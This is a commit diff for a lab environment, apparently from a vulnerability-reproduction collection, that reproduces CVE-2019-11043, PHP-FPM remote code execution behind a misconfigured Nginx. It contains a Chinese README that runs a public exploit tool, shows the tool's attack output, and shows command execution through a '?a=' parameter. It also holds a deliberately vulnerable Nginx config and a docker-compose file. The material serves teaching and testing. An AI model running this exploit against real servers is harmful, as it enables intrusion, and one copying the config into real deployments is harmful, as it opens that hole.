File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change 1+ # PHP-FPM 远程代码执行漏洞(CVE-2019 -11043)
2+
3+ 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。
4+
5+ 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。
6+
7+ 参考链接:
8+
9+ - https://bugs.php.net/bug.php?id=78599
10+ - https://lab.wallarm.com/php-remote-code-execution-0-day-discovered-in-real-world-ctf-exercise/
11+ - https://github.com/neex/phuip-fpizdam
12+
13+ ## 漏洞环境
14+
15+ 执行如下命令启动有漏洞的Nginx和PHP:
16+
17+ ```
18+ docker-compose up -d
19+ ```
20+
21+ 环境启动后,访问` http://your-ip:8080/index.php ` 即可查看到一个默认页面。
22+
23+ ## 漏洞复现
24+
25+ 使用< https://github.com/neex/phuip-fpizdam > 中给出的工具,发送数据包:
26+
27+ ```
28+ $ go run . "http://your-ip:8080/index.php"
29+ 2019/10/23 19:41:00 Base status code is 200
30+ 2019/10/23 19:41:00 Status code 502 for qsl=1795, adding as a candidate
31+ 2019/10/23 19:41:00 The target is probably vulnerable. Possible QSLs: [1785 1790 1795]
32+ 2019/10/23 19:41:02 Attack params found: --qsl 1790 --pisos 152 --skip-detect
33+ 2019/10/23 19:41:02 Trying to set "session.auto_start=0"...
34+ 2019/10/23 19:41:02 Detect() returned attack params: --qsl 1790 --pisos 152 --skip-detect <-- REMEMBER THIS
35+ 2019/10/23 19:41:02 Performing attack using php.ini settings...
36+ 2019/10/23 19:41:02 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
37+ 2019/10/23 19:41:02 Trying to cleanup /tmp/a...
38+ 2019/10/23 19:41:02 Done!
39+ ```
40+
41+ ![ ] ( 1.png )
42+
43+ 可见,这里已经执行成功。
44+
45+ 我们访问` http://your-ip:8080/index.php?a=id ` ,即可查看到命令已成功执行:
46+
47+ ![ ] ( 2.png )
48+
49+ 注意,因为php-fpm会启动多个子进程,在访问` /index.php?a=id ` 时需要多访问几次,以访问到被污染的进程。
Original file line number Diff line number Diff line change 1+ server {
2+ listen 80 default_server;
3+ listen [::]:80 default_server;
4+
5+ root /usr/share/nginx/html;
6+
7+ index index.html index.php;
8+
9+ server_name _;
10+
11+ location / {
12+ try_files $uri $uri/ =404;
13+ }
14+
15+ location ~ [^/]\.php(/|$) {
16+ fastcgi_split_path_info ^(.+?\.php)(/.*)$;
17+ include fastcgi_params;
18+
19+ fastcgi_param PATH_INFO $fastcgi_path_info;
20+ fastcgi_index index.php;
21+ fastcgi_param REDIRECT_STATUS 200;
22+ fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
23+ fastcgi_param DOCUMENT_ROOT /var/www/html;
24+ fastcgi_pass php:9000;
25+ }
26+
27+ }
Original file line number Diff line number Diff line change 1+ version : ' 2'
2+ services :
3+ nginx :
4+ image : nginx:1
5+ volumes :
6+ - ./www:/usr/share/nginx/html
7+ - ./default.conf:/etc/nginx/conf.d/default.conf
8+ depends_on :
9+ - php
10+ ports :
11+ - " 8080:80"
12+ php :
13+ image : php:7.2.10-fpm
14+ volumes :
15+ - ./www:/var/www/html
Original file line number Diff line number Diff line change 1+ <?php
2+ echo "hello world " ;
You can’t perform that action at this time.
0 commit comments